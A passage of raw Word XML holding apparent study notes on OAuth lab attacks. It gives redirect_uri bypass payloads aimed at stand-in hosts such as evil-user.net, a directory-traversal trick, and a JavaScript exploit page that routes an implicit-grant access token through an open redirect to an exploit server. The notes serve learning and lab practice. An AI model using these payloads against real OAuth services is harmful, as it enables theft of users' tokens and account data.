        <w:t>+ place any where in URL</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="004D3836" w:rsidRPr="008026BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
            <w:lang w:val="en-US" w:eastAsia="de-DE"/>
          </w:rPr>
          <w:t>http://attacker-website.com/csrf-attack?redirect_urim</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6933AF5D" w14:textId="203A7FBF" w:rsidR="00204B8C" w:rsidRPr="008026BD" w:rsidRDefault="00204B8C" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="004D3836" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">https://default-host.com </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="@bar.evil-user.net/" w:history="1">
        <w:r w:rsidRPr="008026BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier" w:cs="Courier New"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>&amp;@foo.evil-user.net#@bar.evil-user.net/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D9F1EAA" w14:textId="299C1817" w:rsidR="00204B8C" w:rsidRPr="008026BD" w:rsidRDefault="00204B8C" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="004D3836" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> duplicate redierec_uri:</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="008026BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://oauth-authorization-server.com/?client_id=123&amp;redirect_uri=client-app.com/callback&amp;redirect_uri=evil-user.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D6A794C" w14:textId="026EC58C" w:rsidR="00106DF5" w:rsidRPr="008026BD" w:rsidRDefault="00204B8C" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>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 localhost.evil-user.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D4A46" w14:textId="77777777" w:rsidR="004D3836" w:rsidRPr="008026BD" w:rsidRDefault="004D3836" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539C7499" w14:textId="23374509" w:rsidR="00D84899" w:rsidRPr="008026BD" w:rsidRDefault="004D3836" w:rsidP="004D3836">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stealing codes and access tokens via a proxy page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE747D2" w14:textId="5FCE0D33" w:rsidR="00302AF5" w:rsidRPr="008026BD" w:rsidRDefault="00302AF5" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If redirect_uri is whitelisted, it may still be </w:t>
      </w:r>
      <w:r w:rsidR="00E6651F" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00E6651F" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">rable to directory traversal: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BD527" w14:textId="77777777" w:rsidR="00302AF5" w:rsidRPr="008026BD" w:rsidRDefault="00302AF5" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirect_uri=</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="008026BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier" w:cs="Courier New"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://client-app.com/oauth/callback/../../example/path</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004D3836" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F29B6" w14:textId="666DFCE5" w:rsidR="004D3836" w:rsidRPr="008026BD" w:rsidRDefault="004D3836" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">results in </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://client-app.com/example/path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13789AE1" w14:textId="4AD90DB2" w:rsidR="004D3836" w:rsidRPr="008026BD" w:rsidRDefault="00302AF5" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The directory traversal can be confirmed by changing the redirect_uri on the way in Intercept (pointing to another page of the application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8992E2" w14:textId="77777777" w:rsidR="00302AF5" w:rsidRPr="008026BD" w:rsidRDefault="00302AF5" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B07339E" w14:textId="662F8D48" w:rsidR="00302AF5" w:rsidRPr="008026BD" w:rsidRDefault="00302AF5" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the directory traversal vulnerability to point the </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirect_uri</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which receives and forwards the victim’s code/token to our exploit server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0739B567" w14:textId="20D2AD29" w:rsidR="00106DF5" w:rsidRPr="008026BD" w:rsidRDefault="001000EB" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>implicit grant type</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: if we have the token, we can use it to request victim’s data from the OAuth service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D43B94B" w14:textId="77777777" w:rsidR="001000EB" w:rsidRPr="008026BD" w:rsidRDefault="001000EB" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760A39B8" w14:textId="77777777" w:rsidR="00834DCF" w:rsidRPr="00834DCF" w:rsidRDefault="00834DCF" w:rsidP="00834DCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01553C36" w14:textId="77777777" w:rsidR="00834DCF" w:rsidRPr="00834DCF" w:rsidRDefault="00834DCF" w:rsidP="00834DCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!document.location.hash) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF39A8A" w14:textId="1C98B631" w:rsidR="00834DCF" w:rsidRPr="00834DCF" w:rsidRDefault="00834DCF" w:rsidP="00834DCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">        window.location = '</w:t>
      </w:r>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>https://YOUR-LAB-OAUTH-SERVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>R.</w:t>
      </w:r>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>net/auth?client_id=YOUR-LAB-CLIENT-ID&amp;redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>/../post/next?path=https://exploit-server.net/exploit/</w:t>
      </w:r>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&amp;response_type=token&amp;nonce=399721827&amp;scope=openid%20profile%20email'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457C7F71" w14:textId="77777777" w:rsidR="00834DCF" w:rsidRPr="00834DCF" w:rsidRDefault="00834DCF" w:rsidP="00834DCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431F927" w14:textId="77777777" w:rsidR="00834DCF" w:rsidRPr="00834DCF" w:rsidRDefault="00834DCF" w:rsidP="00834DCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">        window.location = '/?'+document.location.hash.substr(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C30249D" w14:textId="77777777" w:rsidR="00834DCF" w:rsidRPr="00834DCF" w:rsidRDefault="00834DCF" w:rsidP="00834DCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00834DCF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39560920" w14:textId="60206AF1" w:rsidR="00193293" w:rsidRPr="008026BD" w:rsidRDefault="00834DCF" w:rsidP="00834DCF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B38839" w14:textId="29923F4F" w:rsidR="00834DCF" w:rsidRPr="008026BD" w:rsidRDefault="00834DCF" w:rsidP="00834DCF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A937471" w14:textId="2A8A3E5F" w:rsidR="00834DCF" w:rsidRPr="008026BD" w:rsidRDefault="00834DCF" w:rsidP="00834DCF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of </w:t>
      </w:r>
      <w:r w:rsidR="00DC3975" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">open redirect, we can use: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14877BC3" w14:textId="2B431648" w:rsidR="00DC3975" w:rsidRPr="008026BD" w:rsidRDefault="00DC3975" w:rsidP="00834DCF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Javascript (on the server) that receives and forwards the token to our exploit server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79709D99" w14:textId="3957C97B" w:rsidR="00834DCF" w:rsidRPr="008026BD" w:rsidRDefault="00DC3975" w:rsidP="00834DCF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that receives and forwards the token to our exploit server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF264D" w14:textId="7621001F" w:rsidR="00834DCF" w:rsidRPr="008026BD" w:rsidRDefault="00DC3975" w:rsidP="00834DCF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- HTML injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0EA670" w14:textId="77777777" w:rsidR="00646BB7" w:rsidRPr="008026BD" w:rsidRDefault="00646BB7" w:rsidP="00834DCF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D8D724" w14:textId="0E41BE03" w:rsidR="00193293" w:rsidRPr="008026BD" w:rsidRDefault="00646BB7" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
